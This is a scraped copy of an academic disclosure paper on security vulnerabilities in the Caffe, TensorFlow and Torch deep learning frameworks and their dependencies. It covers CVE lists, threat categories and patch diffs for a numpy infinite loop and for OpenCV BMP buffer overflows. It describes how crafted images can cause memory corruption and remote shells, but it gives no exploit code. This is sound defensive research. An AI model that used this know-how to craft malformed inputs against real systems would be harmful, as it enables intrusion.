Thanks to visit codestin.com
Credit goes to www.scribd.com

0% found this document useful (0 votes)
54 views5 pages

Security Risks in Deep Learning Implementations

1. The document discusses security risks in popular deep learning frameworks like Caffe, TensorFlow, and Torch. 2. It finds over a dozen vulnerabilities in the implementations of these frameworks, including heap overflow, integer overflow, and use-after-free issues. 3. These vulnerabilities could allow denial-of-service attacks, evasion of image and speech classifications, and even system compromise for applications built on the vulnerable frameworks.

Uploaded by

kenry02
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
54 views5 pages

Security Risks in Deep Learning Implementations

1. The document discusses security risks in popular deep learning frameworks like Caffe, TensorFlow, and Torch. 2. It finds over a dozen vulnerabilities in the implementations of these frameworks, including heap overflow, integer overflow, and use-after-free issues. 3. These vulnerabilities could allow denial-of-service attacks, evasion of image and speech classifications, and even system compromise for applications built on the vulnerable frameworks.

Uploaded by

kenry02
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 5

Security Risks in Deep Learning Implementations

Qixue Xiao1 , Kang Li2 , Deyue Zhang1 , Weilin Xu3

1
Qihoo 360 Security Research Lab 2
University of Georgia 3
University of Virginia

Abstract—Advance in deep learning algorithms overshadows We made a preliminary study on the threats and risks
their security risk in software implementations. This paper dis- caused by these vulnerabilities. With a wide variety of deep
closes a set of vulnerabilities in popular deep learning frameworks learning applications being built over these frameworks, we
including Caffe, TensorFlow, and Torch. Contrast to the small consider a range of attack surfaces including malformed data
code size of deep learning models, these deep learning frameworks in application inputs, training data, and models. The potential
arXiv:1711.11008v1 [cs.CR] 29 Nov 2017

are complex and contain heavy dependencies on numerous open


consequences from these vulnerabilities include denial-of-
source packages. This paper considers the risks caused by these
vulnerabilities by studying their impact on common deep learning service attack, evasion to classifications, and even to system
applications such as voice recognition and image classifications. compromise. This paper provides a brief summary of these
By exploiting these framework implementations, attackers can vulnerabilities and the potential risks that we anticipate for
launch denial-of-service attacks that crash or hang a deep deep learning applications built over these frameworks.
learning application, or control-flow hijacking attacks that cause
either system compromise or recognition evasions. The goal of Through our preliminary study of three deep learning
this paper is to draw attention on the software implementations frameworks, we make the following contributions:
and call for the community effort to improve the security of deep
learning frameworks.
• This paper exposes the dependency complexity of popular
deep learning frameworks.
• This paper presents a preliminary study of the attack
I. I NTRODUCTION surface for deep learning applications.
Artificial intelligence becomes an attention focus in recent • Through this paper, we show that multiple vulnerabilities
years partially due to the success of deep learning applications. exist in the implementation of these frameworks.
Advances in GPUs and deep learning algorithms along with • We also study the impact of these vulnerabilities and
large datasets allow deep learning algorithms to address real- describe the potential security risks to applications built
world problems in many areas, from image classification on these vulnerable frameworks.
to health care prediction, and from auto game playing to
reverse engineering. Many scientific and engineering fields are II. L AYERED I MPLEMENTATION OF D EEP L EARNING
passionately embracing deep learning. A PPLICATIONS

These passionate adoptions of new machine learning algo- Deep learning frameworks enable fast development of ma-
rithms has sparked the development of multiple deep learning chine learning applications. Equipped with pre-implemented
frameworks, such as Caffe [3], TensorFlow [1], and Torch [6]. neural network layers, deep learning frameworks allow devel-
These frameworks enable fast development of deep learning opers to focus on application logic. Developers can design,
applications. A framework provides common building blocks build, and train scenario specific models on a deep learning
for layers of a neural network. By using these frameworks, framework without worrying about the coding details of input
developers can focus on model design and application specific parsing, matrix multiplication, or GPU optimizations.
logic without worrying the coding details of input parsing,
matrix multiplication, or GPU optimizations.
Program Logic Model Data
DL
In this paper, we examine the implementation of three Apps
popular deep learning frameworks: Caffe, TensorFlow, and
Torch. And we collected their software dependencies based on
Torch theano
the sample applications released along with the framework. DL
The implementation of these frameworks are complex (often
Frameworks TensorFlow Caffe
with hundreds of thousands lines of code) and are often built
over numerous 3rd party software packages, such as image and Framework
video processing, scientific computation libraries. Dependencies
GNU LibC NumPy

A common challenge for the software industry is that


implementation complexity often leads to software vulnera-
bilities. Deep learning frameworks face the same challenge.
Through our examination, we found multiple dozens of im- Fig. 1: The Layered Approach for Deep Learning Applications.
plementation flaws. Among them, 15 ones have been assigned
with CVE numbers. The types of flaws cover multiple common
types of software bugs, such as heap overflow, integer overflow, The exact implementation of deep learning applications
use-after-free. varies, but those built on deep learning frameworks are usually
consisted of software in three layers. Figure 1 shows the III. V ULNERABILITIES AND T HREATS
layers of typical deep learning applications. The top layer
contains the application logic, the deep learning model and While there are numerous discussion about deep learning
corresponding data resulted from the training stage. These are and artificial intelligence applications, the security of these
components usually visible to the developers. The middle layer applications draws less attention. To illustrate the risks and
is the implementation of the deep learning frameworks, such as threats related to deep learning applications, we first present
tensor components and various filters. The interface between the attack surfaces of machine learning applications and then
the top two layers are usually specified in the programming consider the type of risks resulted from implementation vul-
language used to implement the middle layer. For examples, nerabilities.
the choices of programming language interfaces include C++,
Python, and Lua for Caffe, TensorFlow, and Torch respectively.
The bottom layers are building blocks used by the frameworks. A. Attack Surfaces
These build blocks are components to accomplish tasks such
as video and audio processing and model representations (e.g. Without losing generality, here we use MNIST handwriting
protobuf). The selection of building blocks varies depending on digits [11] recognition as an example to consider the attack
the design of a framework. For example, TensorFlow contains surface of deep learning applications. We believe an image
its own implementations of video and image processing built recognition application like MNIST can be exploited from the
over 3rd party packages such as librosa and numpy, whereas following three angles:
Caffe chooses to directly use open source libraries, such as
OpenCV and Libjasper, to parse media inputs. Even the bottom • Attack Surface 1 – Malformed Input Image: Many current
and the middle layers are often invisible to the developers of deep learning applications, once being trained, usually
the deep learning applications, these components are essential work on input data for classification and recognition pur-
part of deep learning applications. poses. For an application that read inputs from files or the
network, attackers potentially can construct malformed
Table I provides some basic statistics of the implementa- input. This applies to the MNIST image recognition
tions of deep learning frameworks. In our study, the versions application, which read inputs from files. The attack
of TensorFlow and Caffe that we analyzed are 1.2.1 and 1.0. surface is significantly reduced for applications that take
The study also include Torch7. As the default Torch package input from a sensor such as a directed connected camera.
only support limited image formats, we choose to study the But the risk of malformed input is not eliminated in those
version of Torch7 that combines OpenCV [9] that support cases, and we will discuss it in the next section.
various image formats such as bmp, gif, and tiff. • Attack Surface 2 – Malformed Training Data: Image
recognition applications take training samples, which can
be polluted or mislabeled if training data come from
We measure the complexity of a deep learning framework external sources. This is often known as data poisoning
by two metrics, the lines of code and the number of software attack.
dependency packages. We count the lines of code by using Data poisoning attack does not need to rely on software
the cloc tool on Linux. As described in table I, all these vulnerabilities. However, flaws in implementations can
implementation’s code bases are not small. Tensorflow has make data poisoning easier (or at least harder to be
more 887 thousands lines of code, Torch has more than 590K detected). For example, we have observed inconsistency
lines of code, and Caffe has more than 127K. In addition, they of the image parsing procedure in the framework and
all depends on numerous 3rd party packages. Caffe is based common desktop applications (such as image viewer).
on more than 130 depending libraries (measured by the Linux This inconsistency can enable a sneaky data pollution
ldd utility), and Tensorflow and Torch depend on 97 Python without being noticed by people managing the training
modules and 48 Lua modules respectively, which was counted process.
by the import or require modules. • Attack Surface 3 – Malformed Models: Deep learning
applications can also be attacked if the developers use
models developed by others. Although many developers
TABLE I: DL frameworks and Their Dependencies design and build models from scratch, many models
are made available for developers with less sophisticated
DL lines of code number of sample packages
Framework dep. package
machine learning knowledge to use. In such case, these
models becomes potential sources that can be manip-
Tensorflow 887K+ 97 librosa,numpy
Caffe 127K+ 137 libprotobuf,libz,opencv
ulated by attackers. Similar to data poisoning attacks,
Torch 590K+ 48 xlua,qtsvg,opencv attackers can threat those applications carrying external
models without exploiting any vulnerabilities. However,
implementation flaws, such as a vulnerability in the model
Layered approach is a common practice for software parsing code help attackers to hide malformed models and
engineering. Layering does not introduce flaws directly, but make the threat more realistic.
complexity in general increases the risks of vulnerabilities.
Any flaw in the framework or its building components affects Certainly, the attack surface varies based on each specific
applications building on it. The next section of this paper application, but we believe these three attack surfaces cover
presents some preliminary findings of flaws in implementa- most of the space from where attackers threat deep learning
tions. applications.
B. Type of Threats researchers have spent a considerable amount of research
effort on generating evasion input through adversarial
We have studied several deep learning frameworks and learning methods [5, 10]. When faced with vulnerable
found a dozen of implementation flaws. Table II summarizes a deep learning framework, attackers can instead achieve
portion of these flaws that have been assigned with CVE num- the goal of evasion by exploiting software bugs. We
bers. These implementation flaws make applications vulnerable found multiple memory corruption bugs in deep learn-
to a wide range of threats. Due to the space limitation, here ing frameworks that can potentially cause applications
we only present the threats caused by malformed input, and to generate wrong classification outputs. Attackers can
we assume the applications take input from files or networks. achieve evasion by exploiting these bugs in two way: 1)
overwriting classification results through vulnerabilities
TABLE II: CVEs Found for DL frameworks and Dependencies that given attackers ability to modify specific memory
content, 2) hijacking the application control flow to skip
DL Framework dep. packages CVE-ID Potential Threats or reorder model execution.
Tensorflow numpy CVE-2017-12852 DOS The list below shows an out-of-bounds write vulnerability
Tensorflow wave.py CVE-2017-14144 DOS and the corresponding patch. The data pointer could be
Caffe libjasper CVE-2017-9782 heap overflow set to any value in the readData function, and then a
Caffe openEXR CVE-2017-12596 crash
Caffe/Torch opencv CVE-2017-12597 heap overflow
specified data could be written to the address pointed by
Caffe/Torch opencv CVE-2017-12598 crash data. So it can potentially overwrite classification results.
Caffe/Torch opencv CVE-2017-12599 crash
Caffe/Torch opencv CVE-2017-12600 DOS Listing 2: OpenCV patch example
Caffe/Torch opencv CVE-2017-12601 crash bool BmpDecoder::readData( Mat& img )
Caffe/Torch opencv CVE-2017-12602 DOS {
uchar* data = img.ptr();
Caffe/Torch opencv CVE-2017-12603 crash ....
if( m_origin &=& IPL_ORIGIN_BL )
Caffe/Torch opencv CVE-2017-12604 crash {
Caffe/Torch opencv CVE-2017-12605 crash data += (m_height - 1)*(size_t)step; // result an out bound write
step = -step;
Caffe/Torch opencv CVE-2017-12606 crash }
Caffe/Torch opencv CVE-2017-14136 integer overflow ....
if( color )
WRITE_PIX( data, clr[t] );
else
• Threat 1 – DoS attacks : The most common vulnerabilities ....
*data = gray_clr[t];

that we found in deep learning frameworks are software }


index 3b23662..5ee4ca3 100644
bugs that cause programs to crash, or enter an infinite --- a/modules/imgcodecs/src/loadsave.cpp
+++ b/modules/imgcodecs/src/loadsave.cpp
loop, or exhaust all of memory. The direct threat caused +

by such bugs are denial-of-service attacks to applications +static Size validateInputImageSize(const Size& size)
+{
running on top of the framework. The list below shows +
+
CV_Assert(size.width > 0);
CV_Assert(size.width <= CV_IO_MAX_IMAGE_WIDTH);
the patch to a bug found in the numpy python package, +
+
CV_Assert(size.height > 0);
CV_Assert(size.height <= CV_IO_MAX_IMAGE_HEIGHT);
which is a building block for the TensorFlow framework. +
+
uint64 pixels = (uint64)size.width * (uint64)size.height;
CV_Assert(pixels <= CV_IO_MAX_IMAGE_PIXELS);
The numpy package is used for matrix multiplication and + return size;
+}
related processing. It is commonly used by applications
built over TensorFlow. The particular bug occurs in the @@ -408,14 +426,26 @@ imread_( const String& filename, int flags, int hdrtype, Mat* mat=0 )
// established the required input image size
pad() function, which contains a while loop that would not -
-
CvSize size;
size.width = decoder->width();
terminate for inputs not anticipated by the developers. The -
+
size.height = decoder->height();
Size size = validateInputImageSize(Size(decoder->width(), decoder->height()));
flaws occur because of the variable safe-pad in the loop
condition is set to a negative value when an empty vector • Threat 3 – System Compromise: For software bugs that
is passed from a caller. Because of this bug, we showed allows an attacker to hijack control flow, attackers can
that popular sample TensoFlow applications, such as the potentially leverage the software bug and remotely com-
Urban Sound Classification [7], will hang with special promise the system that hosts deep learning applications.
crafted sound files. This occurs when deep learning applications run as a
cloud service to input feed from the network.
Listing 1: numpy patch example The list below shows a patch to a simple buffer overflow
--- a/numpy/lib/arraypad.py found in the OpenCV library. The OpenCV library is
+++ b/numpy/lib/arraypad.py
@@ -1406,7 +1406,10 @@ def pad(array, pad_width, mode, **kwargs): a computer vision library which designed for computa-
newmat = _append_min(newmat, pad_after, chunk_after, axis)
tional efficiency and with a strong focus on real-time
-
elif mode == ’reflect’:
for axis, (pad_before, pad_after) in enumerate(pad_width):
applications. OpenCV supports the deep learning frame-
+
+
if narray.size == 0:
raise ValueError("There aren’t any elements to reflect in ’array’!")
works, such as TensorFlow, Torch/PyTorch and Caffe.
+ The buffer overflow occurs in the readHeader function
+ for axis, (pad_before, pad_after) in enumerate(pad_width):
... ... in grfmt_bmp.cpp. The variable m_palatte represents a
method = kwargs[’reflect_type’]
safe_pad = newmat.shape[axis] - 1 buffer whose size is 256*4 bytes, however, the value
while ((pad_before > safe_pad) or (pad_after > safe_pad)):
... ... of clrused is from an input image which can be set to
an arbitrary value by attackers. Therefore, a malformed
• Threat 2 – Evasion attacks: Evasion attacks occur when BMP image could result to buffer overflow from the get-
an attacker can construct inputs that should be classified Bytes() call. Through our investigation, this vulnerability
as one category but being misclassified by deep learning provides the ability to make arbitrary memory writes and
applications as a different category. Machine learning we have successfully forced sample programs (such as
cpp_classification [2] in Caffe) spawning a remote shell the same execution path because all inputs go through the same
based on our crafted image input. layers of calculation. Therefore, simple errors such as divide-
While doing this work, we found another group of re- by-zero would not be easily found by coverage-based fuzzers
searchers [8] that have also studied the vulnerabilities since the path coverage feedback is less effective in this case.
and impact of OpenCV on machine learning applications.
Although their idea of exploring OpenCV for system C. Security Risks due to Logical Errors or Data Manipulation
compromise shares a similar goal with our effort, they
did not find or release vulnerabilities that are confirmed Our preliminary work focused on the “conventional” soft-
by OpenCV developers [4]. In contrast, our findings have ware vulnerabilities that lead to program crash, control flow
been confirmed by corresponding developers and many hijacking or denial-of-service. It is interesting to consider if
of them have been patched based on our suggestion. there are types of bugs specific to deep learning and need
In addition, we have also developed proof-of-concept special detection methods. Evasion attack or data poisoning
exploitation that has successfully demonstrated remote attack do not have to relies on conventional software flaws such
system compromise (by remotely gaining a shell) through as buffer overflow. It is enough to create an evasion if there are
the vulnerabilities found by us. mistakes allowing training or classification to use more data
than what an application suppose to have. The mismatch of
Listing 3: OpenCV patch example data consumption can be caused by a small inconsistency in
index 86cacd3..257f97c 100644
--- a/modules/imgcodecs/src/grfmt_bmp.cpp
data parsing between the framework implementation and the
+++ b/modules/imgcodecs/src/grfmt_bmp.cpp
@@ -118,8 +118,9 @@ bool BmpDecoder::readHeader()
conventional desktop software.
if( m_bpp <= 8 )
{
One additional challenge for detecting logical errors in
- memset( m_palette, 0, sizeof(m_palette)); deep learning applications is the difficulty to differentiate
- m_strm.getBytes( m_palette, (clrused == 0? 1<<m_bpp : clrused)*4 );
+ CV_Assert(clrused < 256); insufficient training from intended manipulation, which targets
+
+
memset(m_palette, 0, sizeof(m_palette));
m_strm.getBytes(m_palette, (clrused == 0? 1<<m_bpp : clrused)*4 ); to have a particular group of inputs misclassified. We plan to
}
iscolor = IsColorPalette( m_palette, m_bpp );
investigate methods to detect such type of errors.
else if( m_bpp == 16 && m_rle_code == BMP_BITFIELDS )

V. C ONCLUSION
IV. D ISCUSSION AND F UTURE W ORK
The purpose of this work is to raise awareness of the
The previous section presents software vulnerabilities in security threats caused by software implementation mistakes.
the implementations of deep learning frameworks. These vul- Deep Learning Frameworks are complex software and thus
nerabilities are only a set of factors that affect the overall ap- it is almost unavoidable for them to contain implementation
plication security. There are multiple other factors to consider, bugs. This paper presents an overview of the implementation
such as where does an application take input from, whether vulnerabilities and the corresponding risks in popular deep
training data are well formatted, that also affect the security learning frameworks. We discovered multiple vulnerabilities
risks. We briefly discussed a few related issues here. in popular deep learning frameworks and libraries they use.
The types of potential risks include denial-of-service, evasion
A. Security Risks for Applications in Closed Environments of detection, and system compromise. Although closed appli-
cations are less risky in terms of their control of the input,
Many sample deep learning applications are designed to they are not completely immune to these attacks. Considering
be used in a closed environment, in which the application the opaque nature of deep learning applications which buries
acquires input directly from sensors closely coupled with the the implicit logic in its training data, the security risks caused
application. For example, the machine learning implementation by implementation flaws can be difficult to detect. We hope
running on a camera only takes data output from the built-in our preliminary results in this paper can remind researchers to
camera sensor. Arguably the risk of malformed input is lower not forget conventional threats and actively look for ways to
than an application takes input from network or files controlled detect flaws in the software implementations of deep learning
by users. However, a closely coupled sensor does not eliminate applications.
threats of malformed input. For example, there are risks
associated with sensor integrity, which can be compromised.
If the sensor communicates with a cloud server where the R EFERENCES
deep learning applications run, attackers could reverse the [1] Gardener and Benoitsteiner, “An open-source software library for Machine Intelli-
communication protocol and directly attack the backend. gence,” https://www.tensorflow.org/, 2017.
[2] Y. Jia, “Classifying ImageNet: using the C++ API,” https://github.com/BVLC/caffe/
tree/master/examples/cpp_classification, 2017.
B. Detect Vulnerabilities in Deep Learning Applications [3] Y. Jia, E. Shelhamer, J. Donahue, S. Karayev, J. Long, R. Girshick, S. Guadarrama,
and T. Darrell, “Caffe: Convolutional architecture for fast feature embedding,” arXiv
We applied traditional bug finding methods, especially preprint arXiv:1408.5093, 2014.
[4] Opencv Developers, “Opencv issue 5956,” https://github.com/opencv/opencv/issues/
fuzzing, to find the software vulnerabilities presented in this 5956, 2017, accessed 2017-09-03.
paper. We expect all conventional static and dynamic analysis [5] N. Papernot, P. McDaniel, I. Goodfellow, S. Jha, Z. B. Celik, and A. Swami,
“Practical black-box attacks against machine learning,” in Proceedings of the 2017
methods apply to the deep learning framework implementation. ACM on Asia Conference on Computer and Communications Security, ser. ASIA
However, we found that coverage-based fuzzing tools are not CCS ’17. New York, NY, USA: ACM, 2017, pp. 506–519.
ideal for testing deep learning applications, especially for [6] Ronan, Clément, Koray, and Soumith, “Torch: A SCIENTIFIC COMPUTING
FRAMEWORK FOR LUAJIT,” http://torch.ch/, 2017.
discovering errors in the execution of models. Taking the [7] A. Saeed, “Urban Sound Classification,” https://devhub.io/zh/repos/aqibsaeed-
MNIST image classifier as an example, almost all images cover Urban-Sound-Classification, 2017.
[8] R. Stevens, O. Suciu, A. Ruef, S. Hong, M. W. Hicks, and T. Dumitras,
“Summoning demons: The pursuit of exploitable bugs in machine learning,” CoRR,
vol. abs/1701.04739, 2017. [Online]. Available: http://arxiv.org/abs/1701.04739
[9] VisionLabs, “OpenCV bindings for LuaJIT+Torch,” https://github.com/VisionLabs/
torch-opencv, 2017.
[10] W. Xu, Y. Qi, and D. Evans, “Automatically evading classifiers,” in Network and
Distributed System Security Symposium, 2016.
[11] L. Yann, C. Corinna, and J. B. Christopher, “The MNIST Database of handwritten
digits,” http://yann.lecun.com/exdb/mnist/, 2017.

You might also like